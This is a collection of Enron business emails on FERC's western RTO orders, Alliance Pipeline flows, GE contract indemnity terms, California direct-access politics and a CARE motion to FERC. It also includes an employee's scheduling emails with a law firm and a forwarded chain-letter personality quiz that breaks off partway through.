West, with a goal of ultimately creating one RTO for the entire western interconnection.? Finally, the FERC is instituting an investigation under Section 206 of the Federal Power Act with respect to wholesale power sales throughout the western interconnection.? Apparently, potential refund liability would apply to wholesale power sale transactions in the western interconnection entered into for a period of 24 hours or less and made when reserve deficiencies are 7.5% or less. FERC also approved the formation of RTO West, an eight-state RTO combining the transmission assets of nine utilities in the Pacific Northwest.? The FERC asked the RTO to make a submission to it by December 1 of this year on its plans for including Canadian transmission and widening the scope of its operations in a broader regional system. RTO West first submitted its plans to the FERC last October. It includes nine electric utilities serving eight western states with some 50,000 miles of transmission lines. The nine utilities include Avista, BPA, Idaho Power, Montana Power, Nevada Power, PacifiCorp, Portland General Electric, Puget Sound Energy and Sierra Pacific. The states where the RTO West would operate are Washington, Oregon, Idaho, Nevada, Utah and parts of Montana, Wyoming and California. A more detailed analysis of the FERC orders will be provided in tomorrow's update. This e-mail message may contain legally privileged and/or confidential information. If you are not the intended recipient(s), or the employee or agent responsible for delivery of this message to the intended recipient(s), you are hereby notified that any dissemination, distribution or copying of this e-mail message is strictly prohibited. If you have received this message in error, please immediately notify the sender and delete this e-mail message from your computer.
A good heads up on Alliance..Margare ---------------------- Forwarded by Margaret Carson/Corp/Enron on 12/13/2000 05:19 PM --------------------------- Market Intelligence - Enron Transportation Services From: Lorna Brennan on 12/13/2000 01:23 PM To: Julie McCoy/ET&S/Enron@ENRON, Steve Klimesh/ET&S/Enron@ENRON, Gary Sova/ET&S/Enron@ENRON, Rob Wilson/ET&S/Enron@ENRON, Lon Stanton/ET&S/Enron@ENRON, David Marye/OTS/Enron@Enron, Courtney Barker/ET&S/Enron@Enron, Sarabeth Smith/OTS/Enron@ENRON, Margaret Carson/Corp/Enron@ENRON, Danny McCarty/ET&S/Enron@Enron, John Goodpasture/OTS/Enron@ENRON, Michael Ratner/OTS/Enron@Enron, Sebastian Corbacho/ET&S/Enron@Enron, Yuan Tian/ET&S/Enron@ENRON, Rockey Storie/ET&S/Enron@ENRON, Kent Miller/ET&S/Enron@ENRON, John Dushinske/ET&S/Enron@ENRON, Dave Neubauer/ET&S/Enron@ENRON, Bill Fowler/ET&S/Enron@Enron, Michael Bodnar/ET&S/Enron@ENRON, Joni Bollinger/ET&S/Enron@ENRON, David Badura/ET&S/Enron@ENRON, Janet Bowers/ET&S/Enron@ENRON, Craig Buehler/ET&S/Enron@ENRON, Bob Burleson/ET&S/Enron@ENRON, Allen Cohrs/ET&S/Enron@ENRON, John Fiscus/ET&S/Enron@ENRON, Steve Gilbert/ET&S/Enron@ENRON, Morgan Gottsponer/ET&S/Enron@ENRON, Stephen Herber/ET&S/Enron@ENRON, Dana Jones/ET&S/Enron@ENRON, Stephanie Korbelik/ET&S/Enron@ENRON, Bill Mangels/ET&S/Enron@ENRON, Penny McCarran/ET&S/Enron@ENRON, Vernon Mercaldo/ET&S/Enron@ENRON, Larry Pavlou/ET&S/Enron@ENRON, Eileen Peebles/ET&S/Enron@ENRON, Tony Perry/ET&S/Enron@ENRON, Loren Penkava/ET&S/Enron@ENRON, Ken Powers/ET&S/Enron@ENRON, Chris Sebesta/ET&S/Enron@ENRON, Frank Semin/ET&S/Enron@ENRON, Neal Shaw/ET&S/Enron@ENRON, Larry Swett/ET&S/Enron@ENRON, Kay Threet/ET&S/Enron@ENRON, Mike Ullom/ET&S/Enron@ENRON, Lisa Valley/ET&S/Enron@ENRON, Chuck Wilkinson/ET&S/Enron@ENRON, Jim Wiltfong/ET&S/Enron@ENRON, Jo Williams/ET&S/Enron@ENRON, Karen Lagerstrom/ET&S/Enron@ENRON, Bob Stevens/ET&S/Enron@ENRON, Sue Neville/ET&S/Enron@ENRON, Mike Barry/ET&S/Enron@ENRON, Martha Janousek/ET&S/Enron@ENRON, Kimberly Watson/ET&S/Enron@ENRON, Don Powell/ET&S/Enron@ENRON, Steve Weller/ET&S/Enron@ENRON, Michael G Stage/ET&S/Enron@ENRON, Tim Johanson/ET&S/Enron@ENRON, Laura Lantefield/ET&S/Enron@ENRON, Frank Oldenhuis/ET&S/Enron@Enron, Jeff Nielsen/ET&S/Enron@Enron, Robert Mason/ET&S/Enron@Enron, Sean Bolks/ET&S/Enron@ENRON, Miriam Martinez/ET&S/Enron@ENRON, Lee Ferrell/ET&S/Enron@Enron, John Williams/ET&S/Enron@ENRON, Reyna Cabrera/ET&S/Enron@Enron, Theresa Branney/ET&S/Enron@Enron, Jan Moore/ET&S/Enron@ENRON, Mary Kay Miller/ET&S/Enron@ENRON, Michel Nelson/ET&S/Enron@ENRON, Mike McGowan/ET&S/Enron@ENRON, Julia White/ET&S/Enron@ENRON, Drew Fossum/ET&S/Enron@ENRON, Lynn Blair/ET&S/Enron@ENRON, Rick Dietz/ET&S/Enron@ENRON, Steven January/ET&S/Enron@ENRON, Sheila Nacey/ET&S/Enron@ENRON, Donna Scott/FGT/Enron@ENRON, Shelley Corman/ET&S/Enron@ENRON, Steven Harris/ET&S/Enron@ENRON, Jeffery Fawcett/ET&S/Enron@ENRON, Lorraine Lindberg/ET&S/Enron@ENRON, Kevin Hyatt/ET&S/Enron@Enron, Christine Stokes/ET&S/Enron@ENRON, TK Lohman/ET&S/Enron@ENRON, Michelle Lokay/ET&S/Enron@Enron, Lindy Donoho/ET&S/Enron@ENRON cc: Subject: Alliance May Test the System Up to 1.5 BCF/d in Next Two Weeks Strong Demand Holds Load Factors High Despite Alliance The introduction of the 1.325 Bcf/d Alliance Pipeline into the North American gas market appears to have had less of an impact on gas flows out of western Canada than expected, according to representatives of TransCanada PipeLines, PG&E Gas Transmission and Alliance. Extremely strong gas demand in the Pacific Northwest, California and in the Midwest has produced continued high load factors on TransCanada and PG&E GT-NW despite the presence of their huge new rival for Western Canadian supply. "The contract picture changed significantly on [TransCanada] since the first of November and primarily at our Empress, AB, delivery point into the TransCanada mainline from the Alberta pipe, but actual physical gas flows [at about 6 Bcf/d] have not changed correspondingly," said Klaus Exner, director of pipeline system operations at TransCanada. "The big picture overview that I would give you is that demand is very high in the Pacific Northwest and California and we continue to run at the highest possible load factor down that leg of our pipeline system out of Alberta, through British Columbia and into the PG&E systems. That hasn't let up at all and we don't foresee that letting up." PG&E Gas Transmission Spokeswoman Sandra McDonough said PG&E GT-NW has been running full at 2.6 Bcf/d for some time and is delivering 900 MMcf/d to non-California load in the Pacific Northwest. "We're turning back demand right now. Every power plant in this region is running full tilt. Tuscarora [Gas Transmission], the Nevada pipeline, is full. Our Northwest deliveries are fixed. We're delivering as much as we can deliver right now." TransCanada's other major export route out of the Western Canadian Sedimentary Basin is the Foothills and Northern Border route into the Midwest. It also continues to operate at high load factors. "We didn't see a huge drop-off in physical flows post Nov. 1. We've seen the IT volumes come up considerably," said Exner. "The one thing that has changed is the volatility of the flows. Customers are making frequent intraday nomination changes and we're seeing more up and down and day-to-day variations, according to the weather and the markets, than we would have when we had a higher firm contract level. The fluctuations are driven purely by the price differential between AECO and the Dawn Hub in Ontario, which indicates whether or not interruptible flow on the mainline is in the money or not." Alliance Pipeline spokesman Jack Crawford said the system has been running flat out at about 1.325 Bcf/d since the valves were opened for commercial service Dec. 1. He also said the pipeline soon would be testing to increase flows on the system. It has been estimated that Alliance could increase gas flows to 1.5 Bcf/d with existing compression. The additional capacity would be divided up among existing shippers, Crawford said. "We haven't cranked up the system above the contract capacity yet. We probably won't do that for a couple weeks until we get things ironed out. Frankly though, I'm not sure Chicago is their best market right now given the pricing in the Pacific Northwest and California." ------------------------------------------------------------------------------ --
Yeh, I finally figured that out just after I sent the e-mail this AM. Scott Dieball 09/12/2000 01:16 PM To: John Schwartzenburg/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT cc: Kay Mann/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Sheila Tweed@ECT Subject: Re: GE Language (Document link: John Schwartzenburg) Thanks John. FYI the contract language (w/GE comments) is attached at the bottom of this E-mail. When you have a minute we can discuss. John Schwartzenburg 09/12/2000 10:43 AM To: Scott Dieball/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kay Mann/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT cc: Sheila Tweed@ECT Subject: Re: GE Language (Document link: Scott Dieball) I think that I agree with the points and comments you folks raised in the first echange on indemnities below, but don't have the document to refer to. Scott, please drop by and brief me on these. Cognizant Gov't? Never heard of the term, and itis not one of the usual defined terms. Don't know how it's used here, suggest you decline andmake them clarify. LOL ISSUES: 1. I suppose that this is a NY law contract. I do not think you can effectively limit your liability for gross negligence or wilful misconduct in NY. Regardless of choice of law, we generally cannot get this limited or excluded in contracts with owners, either. I think you should not accept any GE attempt to limit this by means of the cap on liability or otherwise , and should avoid muddying the water on the point by taking any "to the fullest extent permitted by law" clause or other such stuff as a compromise. It will be important every time we wrap the GE equipment. 2. Generally, I do not think they should be able to limit their indemnity for Haz Mat, patents, etc. 3. They have consistently refused to clarify that the indemnity for all third party losses includes third party consequentials when Brian or whoever else over here has been the lead negotiator with GE in the past. I would like to think that we could get it clarified now that the larger Enron is working it. Please try it again if you can. Scott Dieball 09/11/2000 07:29 PM To: Kay Mann/Corp/Enron@ENRON cc: Brian D Barto/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John Schwartzenburg/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Martin W Penkwitz/NA/Enron@Enron, Roseann Engeldorf/Corp/Enron@ENRON, Sheila Tweed/HOU/ECT@ECT@ENRON, Ben Jacoby/HOU/ECT@ECT@ENRON Subject: Re: GE Language (Document link: John Schwartzenburg) See my comments in blue below. To: Scott Dieball/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Brian D Barto/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John Schwartzenburg/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Martin W Penkwitz/NA/Enron@Enron, Roseann Engeldorf/Corp/Enron@ENRON, Sheila Tweed/HOU/ECT@ECT, Ben Jacoby/HOU/ECT@ECT cc: Subject: GE Language I'm not particularly wild about many of the changes proposed by GE. Agree. Seems that it would be a good idea to get a consensus on how to respond. Here are the issues I see: Indemnity issues: They should indemnify us from claims by their employees/subcontractors. Kay - Is your comment in connection with GE's comment to Section 27.1(iii) (carve out of the 100% LOL for "gross acts" of its subcontractors, vendors, ect.)? GE is in an aggressive outsource mode and needs to remain solely and totally responsible for the actions and liabilities for its subcontractors and vendors. I think Section 20.2(a) as written covers simple negligence of GE's subcontractors and vendors and I would argue that we need to keep Section 27.1(iii) as written dealing with gross negligence of GE's subcontractors and vendors. Indemnity should be triggered by strict liability as well as negligence. Agree - Maybe we could agree to GE's strike out in 20.2(a) provided the phrase "negligent or willfully wrongful" is replaced with "negligent, at fault or strictly liable without fault" (or some variation thereof). What is a cognizant government? Don't know! This was not discussed with MIke so I am not sure what is the meaning of adding this term. We need to also think in terms of how we could be harmed in a situation where GE fails to comply with law, and instead of Enron incurring a monetary penalty, is ordered to shut down the facility. Limit of liability issues: They want to limit their indemnity obligations for complying with laws, patent infringement, liability for haz. waste and liens to 100% of purchase price. They want the limit of liability to apply to gross negligence, if possible. Agree - See 1st comment above re indemnity. They don't want to clarify that they have to indemnify us for another party's claim for consequentials (as in a personal injury claim). Agree. We've don't have anything concrete on assignment yet. Agree. Comments? I suggest we get together before our next scheduled conf. call to discuss our game plan. Sheila has asked that we change Wednesday's call to 1100 Central, or 100 Central if 1100 doesn't work. Is this a problem? Works for me...just let me know when, where, ect. Kay They should have to ---------------------- Forwarded by Kay Mann/Corp/Enron on 09/11/2000 04:07 PM --------------------------- [email protected] on 09/07/2000 07:46:07 PM To: [email protected], [email protected], [email protected], [email protected], [email protected], [email protected] cc: [email protected] Subject: GE Language Folks, Having conferred at last with my colleagues, I can now forward to you our draft language for the Indemnity and LOL clauses. As Steve mentioned in his earlier message, he has suggested some issues to discuss which could bring us closer to resolution on that issue. Please let me know if you have any question! Best regards, Mike g _____________ Michael C. Barnas Counsel, Power Plants Commercial Operations GE Power Systems One River Road - Building 37, Room 307 Schenectady, NY 12345 USA Phone 8*235-7602 (518) 385 7602 Fax 8*235 5466 (518) 385 5466 Mobile 518 369 9538 (See attached file: MajorClausesGE01.doc) - MajorClausesGE01.doc
Thank you for your explanation. Often I think too literally and narrowly and forget about the importance of spin. All the same, I think we should know if Loretta appreciates the open support of evil industry or not...I'd say it's worth a call. E -----Original Message----- From: Dasovich, Jeff [mailto:[email protected]] Sent: Monday, October 22, 2001 1:58 PM To: Evelyn Kahl Subject: RE: Angelides Oct. 19th Letter to L. Lynch Urging July 1 DA Suspension Date Great question. If you think it would be useful, I can back channel to Loretta and find out. I'm of the view that this letter is more to refute Angelides, so that his wild assertions don't go unanswered in the court of public opinion. Perhaps the letter should be addressed to Angelides, instead. On the other hand, I think it is also useful to make it known to the press and the public that the PUC has the regulatory tools, processes, etc. necessary to permit customers broad latitude to manage their own energy needs on the one hand, and ensure that there's not the sort of massive cost-shifting to which Angelides refers on the other. In the public's view this has been painted as an either/or issue. Either we end direct access, or granny faces death and destruction. And that's just not the case. In fact, I think it can be argued that the scenario Angelides paints just isn't in the cards, period. But I may be missing the mark with all this and am open to other views. Let me know if you'd like me to find out if Loretta thinks the letter would help her. Could find that out in pretty short order. Best, Jeff -----Original Message----- From: Evelyn Kahl [mailto:[email protected]] Sent: Monday, October 22, 2001 3:46 PM To: Dasovich, Jeff Subject: RE: Angelides Oct. 19th Letter to L. Lynch Urging July 1 DA Suspension Date Has anyone ever stopped to ask Loretta whether the letters are helpful or not? Two things occur to me. First, it is not becoming for a commissioner to be taking actions consistent with the urgings of industry -- particularly if you're a Democrat. Second, it has always struck me that what she needs is some form of record support, not political pats on the back in one-page letters. I am asking you these questions not judging the proposal to send a letter .... but I've never understood what they're supposed to do for her and I honestly would like to understand. E -----Original Message----- From: Dasovich, Jeff [mailto:[email protected]] Sent: Monday, October 22, 2001 11:33 AM To: Dasovich, Jeff; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected] Subject: RE: Angelides Oct. 19th Letter to L. Lynch Urging July 1 DA Suspension Date FYI. Note below that even the mighty and powerful Power Authority's own crackerjack analysis asserts that there is still a net short (despite DWR contracts and DA "stampede"), which should leave one to believe that, contrary to Angelides' letter, the more the DA the better. Which further supports Loretta Lynch's response to the Angelides' letter that DA reduces the amount of spot power DWR has to buy. Best, Jeff CONSUMER POWER AND CONSERVATION FINANCING AUTHORITY Pace of Power Authority Renewable Portfolio Agenda is Slowed Quite possibly the most significant action taken at the October 19 Consumer Power and Conservation Financing Authority (Power Authority) was its inaction on contracts proposed for approval. The Power Authority has aggressively pursued a broad renewable portfolio, with the intent to approve contracts as soon as possible. Instead of approving a number of contracts on its October 19 agenda, the Power Authority deferred calendared decisions on request for bids until its November 2 meeting, acknowledging that no action can be taken until the Department of Water Resources (DWR) rate agreement stalemate has been resolved. Chairman Freeman stated that the Public Utility Commission's rejection of the rate agreement has created an obstacle for the Power Authority to exercise renewable contracts, to contract for peaker generation and/or to implement demand side programs. The Power Authority relies upon DWR's credit to fund these programs, and until a rate agreement is finalized the Power Authority cannot sign contracts. Freeman indicated that the Power Authority has signed letters of intent to purchase output from 14 biomass facilities in the Central Valley, as well as 400 MW generated by wind. With the Current Glut of Contracts, Why Do We Need Additional Reserves? Kellan Flukinger, Senior Advisor to Chairman Freeman and Laura Doll, provided a detailed presentation explaining why he believes the Power Authority must contract for additional renewable and peaking generation. Flukinger believes that despite direct access and the current glut of electricity supplied in long-term contracts, there still appears to be a net short of a few thousand megawatts within the State. Flukinger concluded that the State still is at the mercy of electric generators who are not subject to PUC regulatory authority and who have no real obligation to build and maintain new facilities or to serve customers within the State. He believes that the short-term contracts and spot purchases leave the state vulnerable to price-spikes and supply shortages. He believes that the reserve can be managed through Time-of-Use and Real-Time-Pricing, conservation, interruptibles, demand side management, renewables and peakers. Power Authority Names William Barry as Chief Financial Officer William Barry was approved as Chief Financial Officer of the Power Authority at its October 19 Board meeting in Sacramento. Mr. Barry currently works for the City of San Francisco, and has worked in the past for the New York Power Authority. ********************************************************************** This e-mail is the property of Enron Corp. and/or its relevant affiliate and may contain confidential and privileged material for the sole use of the intended recipient (s). Any review, use, distribution or disclosure by others is strictly prohibited. If you are not the intended recipient (or authorized to receive for the recipient), please contact the sender or reply to Enron Corp. at [email protected] and delete all copies of the message. This e-mail (and any attachments hereto) are not intended to be an offer (or an acceptance) and do not create or evidence a binding and enforceable contract between Enron Corp. (or any of its affiliates) and the intended recipient or any other party, and may not be relied on by anyone as the basis of a contract by estoppel or otherwise. Thank you. **********************************************************************
John: You aware of, know anything about, this? Best, Jeff > MOTION SEEKING ORDER OR STAY CANCELING OR SUSPENDING CALIFORNIA DEPARTMENT > OF WATER RESOURCES LONG-TERM ENERGY CONTRACTS AND ASSOCIATED IOU RATE > SCHEDULES FOR LACK OF PROPER NOTICE UNDER THE FPA > > Pursuant to Rules 212 of the Rules and Practices and Procedures of the > Federal Energy Regulatory Commission ("FERC"), 18 C.F.R. 385.212, > CAlifornians for Renewable Energy, Inc. ("CARE"), moves for the > Commission's consideration and action to remedy the illegal execution of > long-term energy contracts by the California Department of Water Resources > ("DWR") in regards to the CARE and other party's complaints in EL00-95 > et.al. Under section 205(c) of the Federal Power Act (49 Stat. 851; 16 > U.S.C. 824d(c)) the DWR long-term energy contracts recently disclosed > through legal action by the California legislature and press requires that > these contracts "shall be tendered for filing with the Commission and > posted not less than sixty days nor more than one hundred-twenty days > prior to the date on which the electric service is to commence." We > contend that DWR has failed to comply with the requirements of the FPA in > this matter. The remedy CARE seeks is for the Commission to issue an Order > or Stay canceling or suspending such long-term energy contracts and > associated IOU rate schedules (yet to be submitted to the Commission) > pursuant to FPA section 205 (c). > > DWR disputes its requirements to provide proper notice prior to execution > of said long-term contracts to all the parties to this case and to the > public who have in a statutory and constitutional right to comment on > expenditures of the public's funds in this manner by DWR. In response to > CARE's CPRA request DWR states the "Department's purchases and sales of > power are exempt from the Federal Power Act because DWR is a state agency. > Section 201(f). To the extent that the Department engages in purchases or > sales with counterparties who are subject to Federal Power Act > jurisdiction, any obligation to file with FERC or otherwise comply with > the Act lies with the counterparty to the contract, and not the > department." > > CARE contends that DWR is acting as an "designated representative" for the > Investor Owned Utilities ("IOUs") in the purchase of energy in California, > pursuant to 18 CFR 35.1 (a), without authorization by the Commission. > > "In cases where two or more public utilities are required to file > rate schedules or certificates of concurrence such public utilities may > authorize a designated representative to file upon behalf of all parties > if upon written request such parties have been granted Commission > authorization therefore." > > CARE contends these actions by DWR violated the requirements of 18 CFR > 35.1 (4)(e). > > "No public utility shall, directly or indirectly, demand, charge, > collect or receive any rate, charge or compensation for or in connection > with electric service subject to the jurisdiction of the Commission, or > impose any classification, practice, rule, regulation or contract with > respect thereto, which is different from that provided in a rate schedule > required to be on file with this Commission unless otherwise specifically > provided by order of the Commission for good cause shown." > > CARE contends that ample evidence of DWR's acting as the California IOU's > "designated representative" is provided by DWR's request to the California > Public Utilities Commission ("PUC") for a Revised Revenue Requirement and > Power Purchase Costs Pursuant to Water Code Section 80110 and Public > Utilities Code Section 451 , which is further illustrated by the PUC's > Administrative law Judge's Ruling on the August 7, 2001 Revenue > Requirement of the DWR regarding the IOU S.D.G. & E. applications > 01-10-044, and 01-01-0045 to the PUC , which states: > > "SDG&E shall present alternative calculations of the required system > average rate increases that (1) collect the DWR-related rate increases > over the remaining 5 quarters of the revenue requirement period set forth > in Table A-6 (i.e., the fourth quarter of 2001 and the four quarters of > 2002), (2) collect the DWR-related rate increases over the next 8 quarters > (i.e., the fourth quarter of 2001, the four quarters of 2002, and the > first three quarters of 2003), and (3) collect the DWR-related rate > increases over the period from September 1, 2001 through December 31, > 2002." > > Clearly it is the intent of the DWR to act as the IOU's "designated > representative" to seek approval from the PUC "to collect the DWR-related > rate increases". > > CARE reiterates, it is the public policy that public agencies exist to aid > in the conduct of the people's business and that the proceedings of public > agencies be conducted openly so that the public may remain informed. It is > the intent of the law that actions of public agencies be taken openly and > that their deliberation be conducted openly. The people do not yield their > sovereignty to those agencies that serve them. The people, in delegating > authority, do not give their public servants the right to decide what is > good for the people to know and what is not good for them to know. The > people insist on remaining informed so that they may retain control over > the instruments they have created. DWR has breached its public duties by > failing to provide for myself, CARE, its members, and other members of the > public, our statutory and constitutional right to comment or protest these > long-term energy contracts executed by DWR, the associated expenditures of > the public's funds, and associated rate increases to California energy > consumers. > > In conclusion the Remedy CARE seeks is for the Commission to issue an > Order or Stay canceling or suspending such long-term energy contracts and > associated IOU rate schedules (yet to be submitted to the Commission) > pursuant to FPA section 205 (c), or under what ever statutory authority as > you deem appropriate. > > Respectfully submitted, > Michael E. Boyd President, CARE 8-28-01 (408) > 325-4690 > <<...OLE_Obj...>> >
Thank you, cell phone# 713-899-0954 and home# 713-802-9262 (the cell phone is the best way to get in touch with me) I'll see you tomorrow have a nice day, -Joe -----Original Message----- From: Jonda Stowell <[email protected]>@ENRON [mailto:IMCEANOTES-Jonda+20Stowell+20+3Cjls+40fullenweider+2Ecom+3E+40ENRON@ENRON.com] Sent: Monday, October 01, 2001 12:36 PM To: Stepenovitch, Joe Subject: RE: Discovery Responses Joe- I can't guarantee what time he will call today, but it will have to be between appointments. As he will be at a seminar all next week, his appointments were scheduled VERY tight this week, along with three days of depositions which have been scheduled for over 2 months. It may not be until this evening. He has your work and cell phone numbers. Jonda -----Original Message----- From: [email protected] [mailto:[email protected]] Sent: Monday, October 01, 2001 12:41 PM To: [email protected] Subject: RE: Discovery Responses I will be there tomorrow at 3:45.... Do you know about what time Mr. Fullenweider will be calling so I can give you the phone number. I leave work around 3:30. Whatever time is best for him! Thanks again, -Joe -----Original Message----- From: Jonda Stowell <[email protected]>@ENRON [mailto:IMCEANOTES-Jonda+20Stowell+20+3Cjls+40fullenweider+2Ecom+3E+40ENRON@ ENRON.com] Sent: Monday, October 01, 2001 12:28 PM To: Stepenovitch, Joe Subject: RE: Discovery Responses Joe, Can you come Tuesday at 3:45 to meet with me? I have given Mr. Fullenweider a message to call you in the interim. Jonda -----Original Message----- From: [email protected] [mailto:[email protected]] Sent: Monday, October 01, 2001 11:32 AM To: [email protected] Subject: RE: Discovery Responses Jonda, I understand Mr. Fullenweider has meeting but after what Tonya put me and my family through last week we would like some answers and action. I have cut off all communication with her and now she is sending me emails (trying to act like nothing happened) I'm sure her lawyer is telling her to do that so she can say she has been keeping me informed of my son. (I will forward them to you) I am very upset and I'm sure you can understand why, I really think there is something really wrong ( I just have that feeling or she is mentally unstable ) How can she be aloud to keep me from my son? Anyway, If I can't meet with Mr. Fullenwerider can you and I meet to go over the discovery responses and does this mean were going to a jury trial? Why are they aloud to ask these questions and are we doing the something to Tonya? I don't understand.... I can't get out of leaving on Thursday, this is a business meeting for work (not pleasure) I can come Today, Tuesday and Wednesday anytime after 3:30. I hope that helps Thanks again, -Joe -----Original Message----- From: Jonda Stowell <[email protected]>@ENRON [mailto:IMCEANOTES-Jonda+20Stowell+20+3Cjls+40fullenweider+2Ecom+3E+40ENRON@ ENRON.com] Sent: Monday, October 01, 2001 10:59 AM To: Stepenovitch, Joe Subject: RE: Discovery Responses Dear Joe, I'm sorry but I have Mr. Fullenweider scheduled in back-to-back meetings, hearings and depositions this week. I might be able to arrange a short telephone conference today or tomorrow. Otherwise, his deposition schedule may clear up on Wednesday and Thursday depending on how the Judge rules at a hearing tomorrow morning. If the depositions get reset by the Court, I could fit you in on Wednesday or Thursday. I absolutely must visit with you this week about your discovery responses because I will be out of town next week and they are due next Friday. Jonda -----Original Message----- From: [email protected] [mailto:[email protected]] Sent: Monday, October 01, 2001 7:45 AM To: [email protected] Subject: RE: Discovery Responses Good Morning Jonda, I would like to met with Mr. Fullenweider today if that is possible? I'm going out of town Thursday thru Sunday of this week. I think it is very important that I speak with him as soon as possible. Please let me know if today is good for him. Thanks again, -Joe -----Original Message----- From: Jonda Stowell <[email protected]>@ENRON [mailto:IMCEANOTES-Jonda+20Stowell+20+3Cjls+40fullenweider+2Ecom+3E+40ENRON@ ENRON.com] Sent: Sunday, September 30, 2001 12:18 PM To: Stepenovitch, Joe Subject: Discovery Responses Dear Joe, Would it be possible for you to come in one day next week at about 3:00 p.m. to go over your discovery responses? Alternatively, you could come in two days at 4:00 p.m. On Thursday, I leave early for my son's soccer practice. Perhaps Tuesday and Friday would be good for you??? Jonda L. Stowell Legal Assistant The Fullenweider Firm 4265 San Felipe, Suite 1400 Houston, TX 77027 (713) 624-4100 Telephone (713) 624-4141 Facsimile e-mail: [email protected] ********************************************************************** This e-mail is the property of Enron Corp. and/or its relevant affiliate and may contain confidential and privileged material for the sole use of the intended recipient (s). Any review, use, distribution or disclosure by others is strictly prohibited. If you are not the intended recipient (or authorized to receive for the recipient), please contact the sender or reply to Enron Corp. at [email protected] and delete all copies of the message. This e-mail (and any attachments hereto) are not intended to be an offer (or an acceptance) and do not create or evidence a binding and enforceable contract between Enron Corp. (or any of its affiliates) and the intended recipient or any other party, and may not be relied on by anyone as the basis of a contract by estoppel or otherwise. Thank you. **********************************************************************
This is actually pretty cool. -----Original Message----- From: Castillo, Michael Sent: Wednesday, January 30, 2002 9:53 AM To: Valdes, John Subject: FW: Michael Castillo Enron Corporation [email protected] (713) 345-4794 -----Original Message----- From: Lee, Jennifer Sent: Wednesday, January 30, 2002 9:31 AM To: Mausser, Gregory A.; Sprowls, Cathy; Bowen, Melba A.; Castillo, Michael Subject: >> >> This is a real test given by the Human Relations Dept. at many >>of the >> major corporations today. It helps them get better insight >>concerning their >> employees and potential employees. It's only 10 simple >>questions, so grab >> a pencil and paper, keeping track of your letter answers. Make >>sure to >> change the subject of the e-mail to read YOUR total. When you >>are finished, >> forward this to everyone you know, and also send to the person >>who sent >> this to you. Make sure to put YOUR score in the subject box. >>Ready? >> >> Begin. >> >> 1. When do you feel your best? >> >> (a) in the morning. >> (b) during the afternoon & early evening. >> (c) late at night. >> >> >> 2. You usually walk >> >> (a) fairly fast, with long steps. >> (b) fairly fast, with short, quick steps. >> (c) less fast head up, looking the world in the face. >> (d) less fast, head down. >> (e) very slowly. >> >> >> 3. When talking to people you >> >> (a) stand with your arms folded. >> (b) have your hands clasped. >> (c) have one or both your hands on your hips. >> (d) touch or push the person to whom you are talking. >> (e) play with your ear, touch your chin, or smooth your hair. >> >> >> 4. When relaxing, you sit with >> >> (a) your knees bent with your legs neatly side by side. >> (b) your legs crossed. >> c) your legs stretched out or straight. >> (d) one leg curled under you. >> >> >> 5. When something really amuses you, you react with >> >> (a) a big, appreciative laugh. >> (b) a laugh, but not a loud one. >> (c) a quiet chuckle. >> (d) a sheepish smile. >> >> >> 6. When you go to a party or social gathering you >> >> (a) make a loud entrance so everyone notices you. >> (b) make a quiet entrance, looking around for someone you know. >> (c) make the quietest entrance, trying to stay unnoticed. >> >> >> 7. You're working very hard, concentrating hard, and you're >> interrupted. >> Do you >> (a) welcome the break. >> (b) feel extremely irritated. >> (c) vary between these two extremes. >> >> >> 8. Which of the following colors do you like most? >> >> (a) red or orange. >> (b) black. >> (c) yellow or light blue. >> (d) green. >> (e) dark blue or purple. >> (f) white. >> (g) brown or gray. >> >> 9. When you are in bed at night, in those last few moments >>before >> going to sleep, you lie >> (a) stretched out on your back. >> (b) stretched out face down on your stomach. >> (c) on your side, slightly curled. >> (d) with your head on one arm. >> (e) with your head under the covers. >> >> >> 10. You often dream that you are >> >> (a) falling. >> (b) fighting or struggling. >> (c) searching! for something or somebody. >> (d) flying or floating. >> (e) you usually have dreamless sleep. >> (f) your dreams are always pleasant. >> >> >> POINTS: >> >> 1. (a) 2 (b) 4 (c) 6 >> >> 2. (a) 6 (b) 4 (c) 7 (d) 2 (e) 1 >> >> 3. (a) 4 (b) 2 (c) 5 (d) 7 (e) 6 >> >> 4. (a) 4 (b) 6 (c) 2 (d) 1 >> >> 5. (a) 6 (b) 4 (c) 3 (d) 5 (e) 2 >> >> 6. (a) 6 (b) 4 (c) 2 >> >> 7. (a) 6 (b) 2 (c) 4 >> >> 8. (a) 6 (b) 7 (c) 5 (d) 4 (e) 3 (f) ! 2 (g) 1 >> >> 9. (a) 7 (b) 6 (c) 4 (d) 2 (e) 1 >> >> 10. (a) 4 (b) 2 (c) 3 (d) 5 (e) 6 (f) 1 >> >> >> Now add up the total number of points. >> >> OVER 60 POINTS: >> >> Others see you as someone they should "handle with care." You're >>seen as >> vain, self-centered, and one who is extremely dominant. Others >>may admire >> you, wishing they could be more like you, but don't always >>trust you, >> hesitating to become too deeply involved withyou. >> >> 51 TO 60 POINTS: >> >> Others see you as an exciting, highly volatile, rather impulsive >> personality; a natural leader, who's quick to make decisions, >>though not >> always the right ones. They see you as bold and adventuresome, >>someone who >> will try anything once; someone who takes chances and enjoys an >> adventure.They enjoy being in your company because of the >>excitement you >> radiate. >> >> 41 TO 50 POINTS: >> >> Others see you as fresh, lively, charming, amusing, practical, >>and always >> interesting; someone who's constantly in the center of >>attention, but >> sufficiently well-balanced not to let it go to their head. They >>also see >> you as kind, considerate, and understanding; someone who'll >>always cheer >> them up and help them out. >> >> 31 TO 40 POINTS: >> >> Others see you as sensible, cautious, careful and practical. >>They see you >> as clever, gifted, or talented, but modest; not a person who >>makes friends >> too quickly or easily, but someone who's extremely loyal to >>friends you do >> make and who expect the same loyalty in return .Those who >>really get to >> know you realize it takes a lot to shake your trust in your >>friends but, >> equally, that it takes you a long time to get over it if that >>trust is >> ever broken. >> >> 21 TO 30 POINTS: >> >> Your friends see you as painstaking and fussy. They see you as >>very >> cautious, extremely careful, a slow and steady plodder.It'd >>really surprise >> them if you ever did something impulsively or on the spur of >>the moment, >> expecting you to examine everything carefully from every angle >>and then, >> usually decide against it. They think this reaction is caused >>partly by >> your careful 